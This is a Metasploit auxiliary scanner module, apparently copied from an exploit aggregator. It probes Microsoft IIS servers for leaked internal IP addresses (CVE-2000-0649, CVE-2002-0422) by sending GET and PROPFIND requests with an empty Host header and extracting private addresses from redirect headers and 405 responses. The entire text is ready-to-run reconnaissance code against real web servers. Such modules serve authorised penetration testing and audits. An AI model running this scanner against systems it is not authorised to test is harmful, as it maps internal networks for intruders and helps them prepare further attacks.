## https://sploitus.com/exploit?id=PACKETSTORM:181126
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft IIS HTTP Internal IP Disclosure',
'Description' => %q{
Collect any leaked internal IPs by requesting commonly redirected locations from IIS.
CVE-2000-0649 references IIS 5.1 (win2k, XP) and older. However, in newer servers
such as IIS 7+, this occurs when the alternateHostName is not set or misconfigured. Also
collects internal IPs leaked from the PROPFIND method in certain IIS versions.
},
'Author' => [
'Heather Pilkington',
'Matthew Dunn - k0pak4'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2000-0649'],
['CVE', '2002-0422'],
['BID', '1499'],
['EDB', '20096'],
['URL', 'https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content'], # iis 4,5,5.1
['URL', 'https://support.microsoft.com/en-us/topic/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-http-request-that-does-not-have-a-host-header-or-has-a-null-host-header-is-sent-to-the-server-c493e9bc-dfd3-0d9b-941c-b2d93a957d9e'], # iis 7+
['URL', 'https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500']
]
)
)
end
def run_host(target_host)
uris = ['/', '/images', '/default.htm']
methods = ['GET', 'PROPFIND']
uris.each do |uri|
# Must use send_recv() in order to send a HTTP request without the 'Host' header
vhost_status = datastore['VHOST'].blank? ? '' : " against #{vhost}"
vprint_status("#{peer} - Requesting #{uri}#{vhost_status}")
methods.each do |method|
c = connect
request = c.request_cgi(
'uri' => uri,
'method' => method,
'headers' => { 'Host' => '' }
)
res = c.send_recv(request, 25)
intipregex = /(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})/i
if res.nil?
print_error("no response for #{target_host}")
elsif ((res.code > 300) && (res.code < 310))
vprint_good("Location Header: #{res.headers['Location']}")
result = res.headers['Location'].scan(intipregex).uniq.flatten
if !result.empty?
print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{result.first}")
end
elsif res.code == 405
result = res.body.scan(intipregex).uniq.flatten
if !result.empty?
print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{result.first}")
end
end
next if result.nil?
report_note({
host: target_host,
port: rport,
proto: 'tcp',
sname: (ssl ? 'https' : 'http'),
type: 'iis.ip',
data: result.first
})
end
end
end
end